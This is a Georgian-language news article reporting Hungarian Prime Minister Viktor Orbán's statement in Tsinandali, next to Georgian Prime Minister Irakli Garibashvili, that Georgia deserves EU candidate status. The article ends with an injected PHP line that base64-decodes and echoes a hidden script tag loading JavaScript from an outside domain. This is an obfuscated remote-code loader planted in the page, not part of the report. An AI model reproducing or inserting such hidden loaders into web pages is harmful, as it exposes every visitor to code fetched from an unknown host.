celsiusi
ავერსი საქკაბელი

საქართველო გახლავთ ქვეყანა, რომელიც განსაკუთრებით იმსახურებს კანდიდატის სტატუსს, – ამის შესახებ უნგრეთის პრემიერ-მინისტრმა, ვიქტორ ორბანმა წინანდალში, საქართველოს პრემიერ-მინისტრთან, ირაკლი ღარიბაშვილთან ერთად გამართულ ბრიფინგზე განაცხადა.

როგორც ვიქტორ ორბანმა აღნიშნა,  უნგრეთი გახლავთ საქართველოს ევროპული მისწრაფებების მყარი მხარდამჭერი.

„ჩვენ ყოველთვის უნდა ვიბრძოლოთ საერთაშორისო პოლიტიკაში, რომ კონფლიქტები რაც შეიძლება სწრაფად დასრულდეს სამშვიდობო შეთანხმებით. ეს არის უმთავრესი განვითარებისთვის. ჩვენ უნდა განვაცხადოთ, რომ მსოფლიო შორს არის ამისგან. ჩვენ, ქართველები და უნგრელები, ამაში ერთმანეთს ვგავართ და ყველაფერს ვაკეთებთ ორი ქვეყნის თანამშრომლობის მეშვეობით, რომ ამას გზა გავუკვალოთ. ჩვენ დავიწყეთ სტრატეგიული ხელშეკრულების შესრულება, რომელსაც ხელი მოაწერა ორივე ქვეყანამ. ჩემმა მეგობარმა ირაკლიმ ბრძანა, რომ უნგრეთი გახლავთ საქართველოს ევროპული მისწრაფებების მყარი მხარდამჭერი. ვფიქრობთ, რომ ეს არის სამართლიანი, რომ საქართველოს უნდა მიენიჭოს ევროკავშირთან დაახლოების საშუალება და ეს არის ასევე ევროპულ ინტერესებში. მე მახსოვს ცენტრალური, აღმოსავლეთ ევროპის ქვეყნები როგორ უერთდებოდნენ ევროკავშირს, ეს არის 2000-იანი წლების შუა პერიოდი. ჩვენ შევექმენით კონკურენტუნარიანობა ევროკავშირის. უნგრეთი რომ არ გაწევრიანებულიყო იმ პერიოდში, ჩავარდებოდა ევროკავშირის ეკონომიკური ზრდის მაჩვენებელი. უკანასკნელი 20 წლის ეკონომიკური ზრდა შეიძლება, მივაკუთვნოთ ძირითადად ცენტრალური ევროპის გაწევრიანებას, რაც ნიშნავს, რომ ევროპულ კავშირს სჭირდება ასეთი დინამიზმი, ასეთი ენერგია, ისეთი ადამიანები, ვისაც სურთ, იმუშაონ, იყვნენ კრეატიულები, ვისაც აქვთ ამბიციები. თუ ევროპა არ მიიღებს ასეთ ადამიანებს, როდესაც დრო დადგება, საბოლოოდ ევროკავშირი ფასს გადაიხდის ამისთვის იმით, რომ დაკარგავს თვის კონკურენტუნარიანობას. პატივცემულო ქალბატონებო და ბატონებო, ამ კონტექსტში საქართველო გახლავთ ქვეყანა, რომელიც განსაკუთრებით იმსახურებს კანდიდატის სტატუსს“, – განაცხადა ორბანმა. 

438
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");